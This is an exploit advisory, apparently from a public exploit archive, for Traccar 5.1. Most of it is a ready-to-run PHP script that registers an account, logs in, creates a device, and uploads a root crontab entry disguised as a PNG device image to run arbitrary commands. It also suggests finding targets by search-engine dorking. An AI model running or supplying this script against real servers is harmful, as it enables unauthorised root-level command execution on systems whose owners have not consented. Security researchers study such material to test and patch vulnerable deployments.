=============================================================================================================================================
| # Title     : Traccar 5.1 php code injection Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://www.traccar.org/old-versions/                                                                                       |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs.

[+] save payload as poc.php

[+] usage : C:\www\test>php poc.php

[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');

[+] payload :

<?php

class TraccarExploit {

    private $host;
    private $port;
    private $username;
    private $password;
    private $email;
    private $target_uri;

    public function __construct($host, $port = 8082, $username = '', $password = '', $email = '', $target_uri = '/') {
        $this->host = $host;
        $this->port = $port;
        $this->username = $username;
        $this->password = $password;
        $this->email = $email;
        $this->target_uri = $target_uri;
    }

    public function send_request($method, $uri, $data = null, $ctype = 'application/json') {
        $url = "http://{$this->host}:{$this->port}{$uri}";

        $headers = [
            "Content-Type: {$ctype}",
        ];

        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }

        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

        $response = curl_exec($ch);
        curl_close($ch);

        return json_decode($response, true);
    }

    public function register_user() {
        echo "Registering new user...\n";

        $body = json_encode([
            'name' => $this->username,
            'email' => $this->email,
            'password' => $this->password,
            'totpKey' => null
        ]);

        $res = $this->send_request('POST', $this->target_uri . 'api/users', $body);

        if (!$res || $res['code'] !== 200) {
            die("Failed to register user. Response: " . print_r($res, true));
        }

        echo "User registered successfully.\n";
    }

    public function authenticate() {
        echo "Authenticating...\n";

        $data = http_build_query([
            'email' => $this->email,
            'password' => $this->password
        ]);

        $res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');

        if (!$res || $res['code'] !== 200) {
            die("Failed to authenticate. Response: " . print_r($res, true));
        }

        echo "Authenticated successfully.\n";
    }

    public function upload_cron_file($cmd) {
        echo "Adding new device...\n";

        $body = json_encode([
            'name' => bin2hex(random_bytes(8)),
            'uniqueId' => bin2hex(random_bytes(8))
        ]);

        $res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);

        if (!$res || $res['code'] !== 200) {
            die("Failed to add device. Response: " . print_r($res, true));
        }

        $device_id = $res['id'];
        $cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";
        $cron_filename = bin2hex(random_bytes(6));

        echo "Uploading crontab file...\n";

        $file_data = [
            'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")
        ];

        $this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');

        echo "Cronjob file uploaded successfully. Waiting for execution...\n";
    }

    public function exploit($cmd) {
        $this->register_user();
        $this->authenticate();
        $this->upload_cron_file($cmd);
    }
}

// Usage example:
$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');
$exploit->exploit('id'); // Replace 'id' with your desired command to execute

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================